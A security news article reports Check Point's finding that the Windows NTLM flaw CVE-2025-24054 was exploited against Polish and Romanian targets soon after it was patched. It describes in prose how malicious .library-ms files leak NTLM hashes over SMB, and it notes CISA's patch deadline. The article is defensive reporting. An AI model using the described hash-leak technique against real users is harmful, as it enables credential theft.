Windows NTLM Flaw Actively Exploited Just One Week After Patch Release, Check Point Warns
A critical Windows NTLM vulnerability, tracked as CVE-2025-24054 (CVSS score: 6.5), has come under active exploitation just one week after Microsoft issued a fix in its March 2025 Patch Tuesday update.
The flaw, which enables NTLM hash disclosure and potential spoofing attacks, requires minimal user interaction. A simple action like right-clicking a malicious file can trigger the vulnerability, exposing sensitive user authentication data.
According to Check Point, attackers began leveraging the flaw as early as March 19, targeting both governmental and private sector entities in Poland and Romania. The exploitation was typically carried out by luring users into extracting ZIP archives containing a malicious .library-ms file. Once accessed, the file silently triggered an SMB authentication request to a remote server, leaking the user's NTLM hash.
These stolen hashes can be brute-forced to obtain passwords or used in relay attacks, potentially allowing lateral movement, privilege escalation, and full domain compromise—depending on the privileges of the targeted account.
Although Microsoft did not confirm active exploitation in its advisory, Check Point observed about a dozen attack campaigns between March 19 and March 25. NTLM hash data was routed through SMB servers in countries like Australia, Russia, Turkey, and the Netherlands.
One campaign even included links to archives containing files associated with previous NTLM vulnerabilities, including CVE-2024-43451, previously exploited by Russian APT group Fancy Bear (aka APT28, Forest Blizzard, Sofacy).
In some cases, the.library-ms file was shared outside of ZIP archives, making it even easier to spread.
On April 17, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-24054 to its Known Exploited Vulnerabilities (KEV) catalog. In line with Binding Operational Directive 22-01, federal agencies must patch the flaw by May 8. However, CISA strongly encourages all organizations to urgently address vulnerabilities listed in the KEV to prevent compromise.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
